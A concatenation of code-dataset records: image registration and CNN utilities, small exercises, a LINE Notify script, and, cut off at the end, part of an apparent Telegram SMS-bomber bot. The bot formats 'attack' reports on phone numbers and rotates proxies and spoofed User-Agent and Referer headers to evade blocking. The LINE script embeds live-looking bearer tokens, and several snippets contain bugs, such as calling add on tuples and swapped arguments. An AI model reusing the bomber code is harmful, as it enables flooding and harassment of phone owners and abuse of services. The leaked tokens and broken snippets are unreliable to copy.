Auto-Coding TracedData to file...\")\n IOUtils.ensure_dirs_exist_for_file(auto_coding_json_output_path)\n with open(auto_coding_json_output_path, \"w\") as f:\n TracedDataJsonIO.export_traced_data_iterable_to_jsonl(data, f)\n\n log.info(\"Python script complete\")\n","sub_path":"generate_outputs.py","file_name":"generate_outputs.py","file_ext":"py","file_size_in_byte":7279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"559632981","text":"#Given an integer array , output all the unique pairs that sum up to a specific value k\ndef pair_sum(array, k):\n if len(array) < 2:\n return print(\"Too small\")\n\n seen = ()\n output = ()\n\n for num in array:\n target = num - k\n\n if target not in seen:\n seen.add(num)\n\n else:\n output.add((min(num, target), max(num, target)))\n \n print(\"\\n\".join(map(str, list(output))))\n\npair_sum([1, 2, 3, 2], 4)","sub_path":"array_pair_sum.py","file_name":"array_pair_sum.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"614952501","text":"# Autor: Aline Paulette Villegas Berdejo\n# Descripcion: Texto que describe en pocas palabras el problema que estás resolviendo.\n\n# Escribe tu programa después de esta línea.\nm=int(input(\"Mujeres inscritas: \"))\nh=int(input(\"Hombres inscritos: \"))\n\nta=m+h\npm=(m*100)/ta\nph=(h*100)/ta\n\nprint(\"Total de inscritos: \", ta)\nprint(\"Porcentaje de mujeres: %.1f\" % pm,\"%\")\nprint(\"Porcentaje de hombre: %.1f\" % ph, \"%\")\n","sub_path":"clase.py","file_name":"clase.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"356667266","text":"\"\"\"\r\nMedical Image Analysis (8DC00)\r\nProject Registration\r\nProject Group 20\r\nRebecca Küpper (1008070)\r\nMilan Pit (1025441)\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport registration as reg\r\nimport registration_util as util\r\nfrom IPython.display import display, clear_output\r\nfrom time import time\r\nimport sys\r\nimport os\r\n\r\n## new ##\r\nos.chdir('project')\r\n## --- ##\r\n\r\ndef chooseImage(filenumber, t1t2):\r\n \"\"\"\r\n Choose the right images according to the input\r\n \r\n The inputs are:\r\n filenumber - indicates number of the image, one of ['1_1', '1_2', '1_3', '2_1', '2_2', '2_3', '3_1', '3_2', '3_3']\r\n t1t2 - indicates if you want T1-to-T1 registration or T2-to-T1 registration\r\n \r\n The outputs are:\r\n path_I: the path to the fixed image\r\n path_Im: the path to the moving image\r\n \"\"\"\r\n \r\n filelist = ['1_1', '1_2', '1_3', '2_1', '2_2', '2_3', '3_1', '3_2', '3_3']\r\n \r\n #Assures that the input is right\r\n assert (filenumber in filelist), \"Invalid input, filenumber has to be in {}\".format(filelist) \r\n assert (t1t2=='t1' or t1t2=='t2'), \"Invalid input, t1t2 has to be 't1' or 't2'\"\r\n\r\n \r\n #Picks images depending on input\r\n path_I = '../data/image_data/{}_t1.tif'.format(filenumber)\r\n\r\n if t1t2 == 't1':\r\n path_Im = '../data/image_data/{}_t1_d.tif'.format(filenumber)\r\n else:\r\n path_Im = '../data/image_data/{}_t2.tif'.format(filenumber)\r\n \r\n return path_I, path_Im\r\n\r\ndef pointBasedRegistration(filenumber='3_3',t1t2='t1'):\r\n \"\"\"\r\n Perform point-based registration on two images\r\n This can be between T1-to-T1 registration or T2-to-T1 registration\r\n \r\n The inputs are:\r\n filenumber - indicates number of the image, one of ['1_1', '1_2', '1_3', '2_1', '2_2', '2_3', '3_1', '3_2', '3_3']\r\n t1t2 - indicates if you want T1-to-T1 registration or T2-to-T1 registration\r\n \r\n The outputs are:\r\n Im_t - transformed moving image T(Im)\r\n E_reg - registration error\r\n \"\"\"\r\n \r\n #Chooses images from given input\r\n path_I, path_Im = chooseImage(t1t2, filenumber)\r\n \r\n \r\n I = plt.imread(path_I)\r\n Im = plt.imread(path_Im)\r\n\r\n #Selects points for registration\r\n X, Xm = util.my_cpselect(path_I, path_Im)\r\n\r\n #Makes transformation matrix for registration depending on selected points and applies to the image\r\n T = reg.ls_affine(X,Xm)\r\n Im_t, Xt = reg.image_transform(Im, T)\r\n \r\n #Selects points for registration error\r\n X_ev, X_ev_m = util.my_cpselect(path_I, path_Im)\r\n \r\n #Transforms evaluation points of moved image by inverse transformation matrix\r\n T_inv = np.linalg.inv(T)\r\n X_ev_h = util.c2h(np.array(X_ev_m)) \r\n \r\n #Computes registration error using average distance using Pythagoras\r\n n = len(X_ev[1])\r\n dist = 0\r\n \r\n X_ev_t = T_inv.dot(X_ev_h)\r\n for idx in range(0, n-1):\r\n dist = dist + np.sqrt((X_ev[0][idx] - X_ev_t[0][idx])**2 + (X_ev[1][idx] - X_ev_t[1][idx])**2)\r\n \r\n E_reg = dist / n\r\n \r\n print(E_reg)\r\n \r\n return Im_t, E_reg\r\n\r\ndef intensityBasedRegistration(affine=True, corr=True, iterations=250, mu=1e-3, t1t2='t1', filenumber='1_1'):\r\n \"\"\"\r\n This function is an application of intensity based image registration.\r\n It uses three available methods of intensity based registration:\r\n rigid correlation, affine correlation and affine mutual information.\r\n These functions calculate similarity between the two input images, which is used to register the images.\r\n\r\n The inputs are:\r\n affine (default=True): A boolean that determines whether the affine or rigid method is used.\r\n True means the affine method is used, False means the rigid method is used.\r\n corr (default=True): A boolean that determines whether the similarity is calculated using correlation or mutual information.\r\n True means that correlation is used, False means that mutual information is used. If affine=False, correlation will automatically be used.\r\n iterations (default=250): An integer that determines the amount of times the gradient ascent is updated.\r\n mu (default=1e-3): A float that determines the learning rate of the gradient ascent.\r\n\r\n The output is:\r\n A single image containing:\r\n The final registration; The parameters of the registration; The similarity curve of the two images.\r\n\r\n An example of a correct function call:\r\n intensityBasedRegistration(True, True, 50, 1e-2)\r\n \"\"\"\r\n\r\n #Sanitizes input\r\n iterations = int(iterations)\r\n \r\n # Choose images from given input\r\n path_I, path_Im = chooseImage(t1t2, filenumber)\r\n \r\n \r\n I = plt.imread(path_I)\r\n Im = plt.imread(path_Im)\r\n\r\n #Sets initial parameters and function based on input\r\n if(affine):\r\n x = np.array([0., 1., 1., 0., 0., 0., 0.])\r\n if(corr):\r\n fun = lambda x: reg.affine_corr(I, Im, x)\r\n else:\r\n fun = lambda x: reg.affine_mi(I, Im, x)\r\n else:\r\n x = np.array([0., 0., 0.])\r\n fun = lambda x: reg.rigid_corr(I, Im, x)\r\n\r\n similarity = np.full((iterations, 1), np.nan)\r\n\r\n fig = plt.figure(figsize=(20,10))\r\n\r\n # fixed and moving image, and parameters\r\n ax1 = fig.add_subplot(121)\r\n\r\n # fixed image\r\n im1 = ax1.imshow(I)\r\n \r\n # moving image\r\n im2 = ax1.imshow(I, alpha=0.7)\r\n \r\n #Shows parameters in image\r\n txt = ax1.text(0.3, 0.95,\r\n np.array2string(x, precision=5, floatmode='fixed'),\r\n bbox={'facecolor': 'white', 'alpha': 1, 'pad': 10},\r\n transform=ax1.transAxes)\r\n\r\n #Sets up similarity curve\r\n ax2 = fig.add_subplot(122, xlim=(0, iterations), ylim=(0, 1))\r\n\r\n learning_curve, = ax2.plot(range(1,iterations+1), similarity, lw=2)\r\n ax2.set_xlabel('Iteration')\r\n ax2.set_ylabel('Similarity (%s)' %(\"Correlation\"*(corr) + \"Mutual Information\"*(1-corr)))\r\n ax2.grid()\r\n\r\n # #Logging steps are calculated. Cannot be done easier,\r\n # #as it is not guaranteed that the amount of iterations is evenly divisible by 4\r\n # step1 = int(iterations/4-1)\r\n # step2 = int(iterations/2-1)\r\n # step3 = int(iterations*3/4-1)\r\n\r\n #Stores start time of gradient ascent\r\n start_time = time()\r\n \r\n #Applies gradient descent [iterations] times\r\n for k in np.arange(iterations):\r\n \r\n #Gradient is calculated and applied to the parameters\r\n g = reg.ngradient(fun, x)\r\n x += g*mu\r\n\r\n #Calls similarity function to calculate the similarity and transformed image\r\n S, Im_t, _ = fun(x)\r\n\r\n # #Logs time elapsed and estimated total time of the gradient ascent\r\n print(\"Iteration {:d}/{:d}, {:.2f}% done\".format(k+1, iterations, (k+1)/iterations * 100))\r\n # \r\n # if(k == 0 or k == step1 or k == step2 or k == step3):\r\n # print(\"Elapsed time: {:.1f} s\\nEstimated time: {:.1f} s\".format(\r\n # time()-start_time, (time()-start_time) * (iterations/(k+1))))\r\n # \r\n # elif(k+1==iterations):\r\n # print(\"Duration: {:.2f} s\".format(time()-start_time))\r\n \r\n #Updates moving image and parameters\r\n im2.set_data(Im_t)\r\n txt.set_text(np.array2string(x, precision=5, floatmode='fixed'))\r\n\r\n #Updates similarity curve\r\n similarity[k] = S\r\n learning_curve.set_ydata(similarity)\r\n\r\n #Logs end result of similarity\r\n print(\"Final similarity: %f\" %(S))\r\n\r\n #Shows final image and plot (required for non-jupyter python)\r\n # plt.show() \r\n filename = \"../plaatjes/{}__{}__9e5__250it.png\".format(t1t2, filenumber) \r\n plt.savefig(filename)\r\n return S\r\n\r\nif(__name__ == \"__main__\"): \r\n\r\n # Uncomment either point based registration or intensity based registration.\r\n \r\n images = ('1_1', '1_2', '1_3', '2_1', '2_2', '2_3', '3_1', '3_2', '3_3')\r\n t1t2 = 't2' \r\n \r\n ######################################################\r\n \r\n # Point based registration\r\n \r\n # pointBasedRegistration(t1t2,images[0])\r\n \r\n ######################################################\r\n \r\n # Intensity based registration\r\n \r\n aff = True\r\n corr = True\r\n it = 250\r\n mu = 9e-5\r\n \r\n S = []\r\n for i, image in enumerate(images):\r\n print(\"Processing image {} of {}.\".format(i+1, len(images)))\r\n S.append(intensityBasedRegistration(aff, corr, it, mu, image, t1t2))\r\n \r\n \r\n # Print results\r\n for j in range(len(S)):\r\n print(images[j]+': '+str(S[j]))\r\n \r\n #######################################################\r\n \r\n \r\n \r\n","sub_path":"project/registration_project.py","file_name":"registration_project.py","file_ext":"py","file_size_in_byte":8632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"227667614","text":"def is_palindrome_num(num):\n if num == 0:\n return True\n elif num < 0:\n i = num * (-1)\n else:\n i = num\n num_list = []\n while i / 10 != 0:\n num_list.append(i % 10)\n i = i // 10\n is_palindrome = True\n l_idx = 0\n r_idx = len(num_list) - 1\n while r_idx > l_idx:\n if num_list[l_idx] != num_list[r_idx]:\n is_palindrome = False\n break\n r_idx -= 1\n l_idx += 1\n return is_palindrome\n\n\nprint(is_palindrome_num(0))\nmax_palindrome = -1\ns_cycle = False\nfor i in range(100, 1000):\n for j in range(100, 1000):\n mult = i * j\n is_pal = is_palindrome_num(mult)\n if is_pal and mult > max_palindrome:\n max_palindrome = mult\n\nprint(max_palindrome)","sub_path":"DedMokar/Palindrome.py","file_name":"Palindrome.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"506270088","text":"#!/usr/bin/env python\n__author__ = \"Mike Gavrilov\"\n__copyright__ = \"Copyright 2013\"\n__license__ = \"\"\n__version__ = \"0.5\"\n__email__ = \"gavrikster _ at _ gmail.com\"\n__status__ = \"Beta\"\n\n\nimport sys\nfrom PySide.QtGui import *\nfrom mainWindow import MainWindow\n\napp = QApplication(sys.argv)\n\nMAIN_WINDOW = MainWindow()\nMAIN_WINDOW.show()\nMAIN_WINDOW.on_tool_cm_press()\n\napp.exec_()\n\n","sub_path":"sqldumpGUI.py","file_name":"sqldumpGUI.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"78000192","text":"import math\n#diameter of jar = 10cm\n#height of jar = 16cm\n#circumference = 2πr\n#area of circle = πr²\n\npi = math.pi\njar_diameter = 10\njar_radius = 5\njar_height = 16\njar_base_area = pi*(jar_radius ** 2)\njar_volume_cm = jar_base_area * jar_height\nprint(jar_volume_cm)\n\ncookie_diameter = 6\ncookie_radius = 3\ncookie_height = 2\ncookie_base_area = pi*(cookie_radius ** 2)\ncookie_volume_cm = cookie_base_area * cookie_height\nprint(cookie_volume_cm)\n\nincrement = int(0)\n\ncookiefit = True\n\nwhile cookiefit == True:\n print(increment)\n if cookie_volume_cm > jar_volume_cm:\n cookiefit = False\n else:\n jar_volume_cm = jar_volume_cm - cookie_volume_cm\n increment = increment + 1\n\nprint(\"finished\")\n#MATHS\n#\n#math.pi\n#math.sqrt(2)\n#math.sqrt(-1)\n#math.sin(0)\n#math.sin(math.pi / 2)\n#math.log(1)\n#math.log(math.e)\n#\n#\n#\n#\n#\n#\n\n\n","sub_path":"jar.py","file_name":"jar.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"55480363","text":"#pip\r\n# pip\r\nimport requests\r\n\r\n\r\n\r\ndef lineNotifyMessage(token='lkGIyFAxVcJcW9qswWggKzarqaTGQJu9QkqjksmcdKD', msg='Notify from LINE, HELLO WORLD'):\r\n headers = {\r\n \"Authorization\": \"Bearer \" + token,\r\n \"Content-Type\": \"application/x-www-form-urlencoded\"\r\n }\r\n\r\n payload = {'message': msg}\r\n r = requests.post(\"https://notify-api.line.me/api/notify\", headers=headers, params=payload)\r\n return r.status_code\r\n\r\n\r\n\r\n\r\ndef main():\r\n\r\n lineNotifyMessage(token='zqTJF3vTvJbTHwkmKs9J74PPdX8iuNwwM9ix8SGKGqG')\r\n\r\nif __name__ == '__main__':\r\n\r\n main()\r\n print('Complete!!!!!!!!!!')","sub_path":"line/line_notify_message.py","file_name":"line_notify_message.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"174964623","text":"import os\nimport cv2\nimport copy\nimport numpy as np\nimport tensorflow as tf\nfrom os import listdir\nfrom pathlib import Path\nfrom os.path import isfile, join\nfrom tqdm import tqdm\nfrom sklearn.datasets import load_sample_image\nfrom sklearn.feature_extraction import image\n\nimport matplotlib.pyplot as plt\n\ndef create(pp, img, p):\n\n img_ = np.zeros((p, 128, 128, 1), dtype=np.float32)\n\n for i in range(len(img)):\n mask = np.random.choice([0, 1], size=(128, 128), p=[1-pp, pp])\n idx_w, idx_h = np.where(mask == 1)\n \n for j in range(len(idx_w)):\n img[i, idx_w[j],idx_h[j],0] = 0\n \n img_[i,:,:,0] = img[i,:,:,0]\n return img_\n\ndef curate(path, lt, x, y):\n \n cnt = 0\n for idx, j in tqdm(enumerate(lt)):\n onlyfiles = [f for f in listdir(lt[idx]) if isfile(join(lt[idx], f))]\n onlyfiles.remove('Thumbs.db')\n\n for _, i in enumerate(onlyfiles):\n p = join(str(lt[idx]),i)\n img = cv2.imread(p, 0)\n y_patches = image.extract_patches_2d(img, (128,128), max_patches = 8)\n \n y_patches = np.reshape(y_patches,(8, 128,128,-1))\n\n \n y_patch = copy.deepcopy(y_patches)\n x_patches = create(0.85, y_patch, 8)\n \n for k in range(len(x_patches)):\n x[cnt] = x_patches[k]\n y[cnt] = y_patches[k]\n cnt += 1\n\ndef curate_(path, lt, x, y):\n\n cnt = 0\n for idx, j in tqdm(enumerate(lt)):\n onlyfiles = [f for f in listdir(lt[idx]) if isfile(join(lt[idx], f))]\n\n for _, i in enumerate(onlyfiles):\n p = join(str(lt[idx]),i)\n img = cv2.imread(p, 0)\n y_patches = image.extract_patches_2d(img, (128,128), max_patches = 2)\n\n y_patches = np.reshape(y_patches,(2, 128,128,-1))\n\n\n y_patch = copy.deepcopy(y_patches)\n x_patches = create(0.85, y_patch, 2)\n\n for k in range(len(x_patches)):\n x[cnt] = x_patches[k]\n y[cnt] = y_patches[k]\n cnt += 1\n\ndef imgSave():\n \n x_ = np.zeros((10, 128, 128, 1), dtype=np.uint8)\n y_ = np.zeros((10, 128, 128, 1), dtype=np.uint8)\n\n data = Path('/workspace/storage/cnn-cs/data/test')\n lst = os.listdir(data)\n lst.sort()\n\n count = 0\n\n for _, i in enumerate(lst):\n p = join(data,i)\n img = cv2.imread(p, 0)\n\n y_patches = image.extract_patches_2d(img, (128, 128), max_patches = 1)\n y_patches = np.reshape(y_patches,(1, 128, 128,-1))\n y_patch = copy.deepcopy(y_patches)\n x_patches = create(0.10, y_patch, 1)\n\n for k in range(len(x_patches)):\n x_[count] = x_patches[k]\n y_[count] = y_patches[k]\n count += 1\n\n x_ = x_ / 255.\n y_ = y_ / 255.\n\n fig = plt.figure(figsize=(25, 25))\n columns = 10\n rows = 1\n for i in range(1, columns*rows + 1):\n img_x = x_[i-1]\n ax = fig.add_subplot(rows, columns, i)\n ax.set_xticks([])\n ax.set_yticks([])\n plt.imshow(np.reshape(img_x,(128,128)),cmap='gray')\n\n plt.savefig('/workspace/data/image_sparse.png')\n \n model = tf.keras.models.load_model('/workspace/data/cs-simple-model-1000.h5', compile =False)\n \n predict = model.predict(x_[:10,:,:,:])\n \n fig = plt.figure(figsize=(25, 25))\n columns = 10\n rows = 1\n for i in range(1, columns*rows + 1):\n img_x = predict[i-1]\n ax = fig.add_subplot(rows, columns, i)\n ax.set_xticks([])\n ax.set_yticks([])\n plt.imshow(np.reshape(img_x,(128,128)), cmap='gray')\n\n plt.savefig('/workspace/data/image_recons.png')\n psnr_ = tf.image.psnr(y_[:10,:,:,:], predict, max_val=1.0)\n print(psnr_)\n\ndef printResult(X, Y):\n\n fig = plt.figure(figsize=(9, 4))\n columns = 10\n rows = 1\n for i in range(1, columns*rows + 1):\n img_x = X[i-1]\n ax = fig.add_subplot(rows, columns, i)\n ax.set_xticks([])\n ax.set_yticks([])\n plt.imshow(img_x, cmap = 'gray')\n plt.show()\n return None \n\ndef saveResult():\n rows = 3\n cols = 3\n\n fig = plt.figure(figsize=(12,10))\n\n for i in range(1,rows+1):\n for j in range(1, cols+1):\n img = cv2.imread(os.path.join(os.getcwd(),onlyfewfiles[((i-1)*rows)+j - 1]), 0)\n patch = image.extract_patches_2d(img, (128,128), max_patches = 1)\n img = np.resize(patch,(128,128))\n ax = fig.add_subplot(rows, cols, ((i-1)*rows)+j)\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_title('{}\\nNewline'.format(onlyfewfiles[((i-1)*rows)+j - 1]), fontsize=8)\n plt.imshow(img, cmap='gray')\n\n plt.show()\n\n return None\n\ndef convertModel(path):\n \n lst = [x for x in os.listdir(path) if os.path.isdir(os.path.join(path,x))]\n\n for idx, val in enumerate(lst):\n converter = tf.lite.TFLiteConverter.from_saved_model(path+'/'+val)\n tflite_model = converter.convert()\n with open('/home/wilfred/Downloads/github/Python_Projects/cnn-cs/results/constant_85/'+val+'-model.tflite', 'wb') as f:\n f.write(tflite_model)\n return None\n\ndef extractWeights(path):\n \n model = tf.keras.models.load_model(path, compile=False)\n\n for layer in model.layers:\n if len(layer.weights) > 0:\n print(layer.name, layer.weights[0].shape)\n print(np.where(layer.weights[0] == 0))\n\n return None\n\nif __name__ == \"__main__\":\n\n '''\n count_n = 0\n IMG_WIDTH = 128\n IMG_HEIGHT = 128\n\n Path1 = Path('/workspace/storage/cnn-cs/data/images')\n Path2 = Path('/workspace/storage/cnn-cs/data/train')\n\n lst = [x for x in Path1.iterdir() if Path1.is_dir()]\n lst_ = [x for x in Path2.iterdir() if Path2.is_dir()] \n\n for i in range(len(lst)):\n count_n += len(os.listdir(os.path.join(Path1,lst[i]))) - 1\n \n x_train = np.zeros((count_n * 8, IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.uint8)\n y_train = np.zeros((count_n * 8, IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.uint8)\n\n curate(Path1, lst, x_train, y_train)\n\n count_n = 0\n\n for i in range(len(lst_)):\n count_n += len(os.listdir(os.path.join(Path2,lst_[i]))) \n\n X_train = np.zeros((count_n * 2, IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.uint8)\n Y_train = np.zeros((count_n * 2, IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.uint8)\n\n curate_(Path2, lst_, X_train, Y_train)\n \n\n convertModel()\n '''\n\n\n #p_hi = '/home/wilfred/Downloads/github/Python_Projects/cnn-cs/results/constant_85/hi-model/cs-hi-model-500.h5'\n p_simple = '/home/wilfred/Downloads/github/Python_Projects/cnn-cs/results/constant_85/simple-model/cs-simple-model-500.h5'\n p_sq = '/home/wilfred/Downloads/github/Python_Projects/cnn-cs/results/constant_85/sq-model/cs-sq-model-500.h5'\n extractWeights(p_sq)\n","sub_path":"utils/utilities_new.py","file_name":"utilities_new.py","file_ext":"py","file_size_in_byte":6833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"298539245","text":"from multiprocessing import Value\nimport numpy as np\nfrom pfb.opt import power_method, pcg, primal_dual\nfrom pfb.operators import PSF, DaskPSI\n\ndef grad_func(x, dirty, psfo):\n return psfo.convolve(x) - dirty\n\ndef sara(psf, model, residual, sig_21=1e-6, sigma_frac=0.5, \n mask=None, beam=None, dual=None, weights21=None, \n nthreads=1, maxit=10, gamma=0.99, tol=1e-3, # options for outer optimisation\n psi_levels=3, psi_basis=None, # sara dict options\n reweight_iters=None, reweight_alpha_ff=0.5, reweight_alpha_percent=10, # reweighting options\n pdtol=1e-6, pdmaxit=250, pdverbose=1, positivity=True, tidy=True, # primal dual options\n cgtol=1e-6, cgminit=25, cgmaxit=150, cgverbose=1, # conjugate gradient options\n pmtol=1e-5, pmmaxit=50, pmverbose=1): # power method options\n \n if len(residual.shape) > 3:\n raise ValueError(\"Residual must have shape (nband, nx, ny)\")\n \n nband, nx, ny = residual.shape\n\n if beam is None:\n beam = lambda x: x\n else:\n try:\n assert beam.shape == (nband, nx, ny)\n beam = lambda x: beam * x\n except:\n raise ValueError(\"Beam has incorrect shape\")\n\n if mask is None:\n mask = lambda x: x\n else:\n try:\n if mask.ndim == 2:\n assert mask.shape == (nx, ny)\n mask = lambda x: mask[None] * x\n elif mask.ndim == 3:\n assert mask.shape == (1, nx, ny)\n mask = lambda x: mask * x\n else:\n raise ValueError\n except:\n raise ValueError(\"Mask has incorrect shape\")\n\n # PSF operator\n psfo = PSF(psf, nthreads=nthreads, imsize=residual.shape, mask=mask, beam=beam)\n residual = beam(mask(residual))\n if model.any():\n dirty = residual + psfo.convolve(model)\n else:\n dirty = residual\n\n # wavelet dictionary\n if psi_basis is None:\n psi = DaskPSI(imsize=residual.shape, nlevels=psi_levels, nthreads=nthreads)\n else:\n if not isinstance(psi_basis, list):\n psi_basis = [psi_basis]\n psi = DaskPSI(imsize=residual.shape, nlevels=psi_levels, nthreads=nthreads, bases=psi_basis)\n \n # l21 weights and dual \n if weights21 is None:\n print(\" Initialising all l21 weights to unity.\")\n weights21 = np.ones((psi.nbasis, psi.nmax), dtype=residual.dtype)\n if dual is None:\n dual = np.zeros((psi.nbasis, nband, psi.nmax), dtype=residual.dtype)\n\n # l21 reweighting\n if reweight_iters is not None:\n reweight_iters = list(reweight_iters)\n else:\n reweight_iters = []\n \n # residual\n residual_mfs = np.sum(residual, axis=0)\n rms = np.std(residual_mfs)\n rmax = np.abs(residual_mfs).max()\n \n # preconditioning operator\n def hess(x): \n return psfo.convolve(x) + x / (sigma_frac*rmax) \n\n if tidy:\n # spectral norm\n posthess = hess\n beta, betavec = power_method(hess, residual.shape, tol=pmtol, maxit=pmmaxit, verbosity=pmverbose)\n else:\n posthess = lambda x: x\n beta = 1.0\n betavec = 1.0\n\n # deconvolve\n for i in range(0, maxit):\n M = lambda x: x * (sigma_frac*rmax) # preconditioner\n x = pcg(hess, residual, np.zeros(residual.shape, dtype=residual.dtype), M=M, tol=cgtol,\n maxit=cgmaxit, minit=cgminit, verbosity=cgverbose)\n \n # update model\n modelp = model\n model = modelp + gamma * x\n model, dual = primal_dual(posthess, model, modelp, dual, sig_21, psi, weights21, beta,\n tol=pdtol, maxit=pdmaxit, report_freq=25, mask=mask, verbosity=pdverbose,\n positivity=positivity)\n\n # reweighting\n if i in reweight_iters:\n l2_norm = np.linalg.norm(dual, axis=1)\n for m in range(psi.nbasis):\n indnz = l2_norm[m].nonzero()\n alpha = np.percentile(l2_norm[m, indnz].flatten(), reweight_alpha_percent)\n alpha = np.maximum(alpha, 1e-8) # hardcode minimum\n weights21[m] = alpha/(l2_norm[m] + alpha)\n reweight_alpha_percent *= reweight_alpha_ff\n\n # get residual\n residual = -grad_func(model, dirty, psfo)\n \n # check stopping criteria\n residual_mfs = np.sum(residual, axis=0)\n rmax = np.abs(residual_mfs).max()\n rms = np.std(residual_mfs)\n eps = np.linalg.norm(model - modelp)/np.linalg.norm(model)\n\n print(\" SARA - At iteration %i peak of residual is %f, rms is %f, current eps is %f\" % (i+1, rmax, rms, eps))\n\n if eps < tol:\n print(\" SARA - Success, convergence after %i iterations\" %(i+1))\n break\n\n if tidy and i{meta[\"from_user\"]}\\n'\r\n f'Number: {meta[\"formatted\"]}\\n'\r\n f'Cycles: {meta[\"cycles\"]}\\n'\r\n f'Attack UID: {meta[\"attack_id\"]}\\n'\r\n f'Operator: {meta[\"operator\"]}\\n'\r\n f'Country: {meta[\"country\"]}\\n'\r\n f'Region: {meta[\"region\"]}')\r\n\r\n kb = types.InlineKeyboardMarkup()\r\n button1 = types.InlineKeyboardButton(\r\n \"Забанить\",\r\n callback_data=f\"ban_user {meta['from_user']}\"\r\n )\r\n button2 = types.InlineKeyboardButton(\r\n 'Профиль',\r\n callback_data=f\"get_profile {meta['from_user']}\"\r\n )\r\n button3 = types.InlineKeyboardButton(\r\n 'Остановить',\r\n callback_data=f\"stop_attack {meta['from_user']}\"\r\n )\r\n button4 = types.InlineKeyboardButton(\r\n 'Ссылка',\r\n url=f'tg://resolve?domain={database.get_user(meta[\"from_user\"])[\"user_name\"]}'\r\n )\r\n button5 = types.InlineKeyboardButton(\r\n 'Логи',\r\n callback_data=f\"send_logs {meta['attack_id']}\"\r\n )\r\n\r\n kb.row(button1, button2)\r\n\r\n if database.get_user(meta[\"from_user\"])[\"user_name\"] is not None:\r\n kb.row(button3, button4)\r\n kb.row(button5)\r\n\r\n else:\r\n kb.row(button3, button5)\r\n text += f'\\n\\nMention of a user'\r\n\r\n await bot.send_message(config.attacks_logs, text, reply_markup=kb, parse_mode='html')\r\n\r\n\r\ndef get_user_agent():\r\n software_names = [SoftwareName.CHROME.value, SoftwareName.LYNX.value,\r\n SoftwareName.BLUE_CHROME.value, SoftwareName.EDGE.value,\r\n SoftwareName.INTERNET_EXPLORER.value, SoftwareName.FIREFOX.value,\r\n SoftwareName.SAFARI.value, SoftwareName.YANDEX.value,\r\n SoftwareName.CHROMIUM.value]\r\n operating_systems = [OperatingSystem.WINDOWS.value, OperatingSystem.LINUX.value,\r\n OperatingSystem.ANDROID.value, OperatingSystem.CHROMEOS.value,\r\n OperatingSystem.MAC_OS_X.value, OperatingSystem.MACOS.value,\r\n OperatingSystem.DARWIN.value, OperatingSystem.IOS.value,\r\n OperatingSystem.WINDOWS_PHONE.value]\r\n\r\n user_agent_rotator = UserAgent(software_names=software_names, operating_systems=operating_systems, limit=100)\r\n\r\n user_agent = user_agent_rotator.get_random_user_agent()\r\n\r\n return user_agent\r\n\r\n\r\ndef get_client(proxy_status: bool):\r\n proxy_string = random.choice(database.get_proxys()) if proxy_status else str()\r\n\r\n agent = get_user_agent()\r\n referer = random.choice(['https://yandex.ru/', 'https://www.google.com/',\r\n 'https://www.bing.com/', 'https://ya.ru/', 'https://mail.ru/',\r\n 'https://www.rambler.ru/', 'https://www.startpage.com/',\r\n 'https://www.qwant.com/?l=en', 'https://duckduckgo.com/',\r\n 'https://www.ecosia.org/', 'https://swisscows.com/',\r\n 'https://www.yahoo.com/', 'https://www.youtube.com/'])\r\n\r\n headers = {\r\n \"User-Agent\": agent,\r\n \"X-Requested-With\": \"XMLHttpRequest\",\r\n \"Referer\": referer,\r\n \"Accept-Encoding\": \"gzip, deflate\",\r\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,\"\r\n \"*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\r\n \"Connection\": \"keep-alive\",\r\n \"Accept-Language\": \"ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7\"\r\n }\r\n\r\n return aiohttp.ClientSession(\r\n headers=headers,\r\n connector=ProxyConnector.from_url(f'http://{proxy_string}')\r\n ) if proxy_status else aiohttp.ClientSession(\r\n headers=headers,\r\n connector=aiohttp.TCPConnector(limit=300, ssl=False)\r\n )\r\n\r\n\r\ndef generate_attack_message(formatted: str, status: str,\r\n connection: str, uid: str,\r\n cycles: int, country: str,\r\n region: str, operator: str,\r\n send_msg: int, cycles_completed: int,\r\n progressbar: str, attack_start_time: str,\r\n attack_stop_time: str):\r\n return f'Атака на номер {formatted}\\n\\n' \\\r\n f'Статус: {status}\\n' \\\r\n f'Подключение: {connection}\\n' \\\r\n f'UID: {uid}\\n' \\\r\n f'Количество циклов: {cycles}\\n\\n' \\\r\n f'Страна: {country}\\n' \\\r\n f'Регион: {region}\\n' \\\r\n f'Оператор: {operator}\\n\\n' \\\r\n f'Время начала атаки: {attack_start_time}\\n' \\\r\n f'Время окончания атаки: {attack_stop_time}\\n\\n' \\\r\n f'Количество отправленных СМС: {send_msg}\\n' \\\r\n f'Количество пройденных циклов: {cycles_completed}\\n\\n' \\\r\n f'{progressbar}'\r\n\r\n\r\ndef user_logger(attack_id: str, category: str, message: str, newattack: bool = False):\r\n if not newattack:\r\n for message in message.splitlines():\r\n with open(f'{__main__.PATH}/user_logs/{attack_id}.txt', 'a', encoding='utf8') as f:\r\n f.write(f'[{tools.get_formatted_time()}] [{category}] {message}\\n')\r\n else:\r\n with 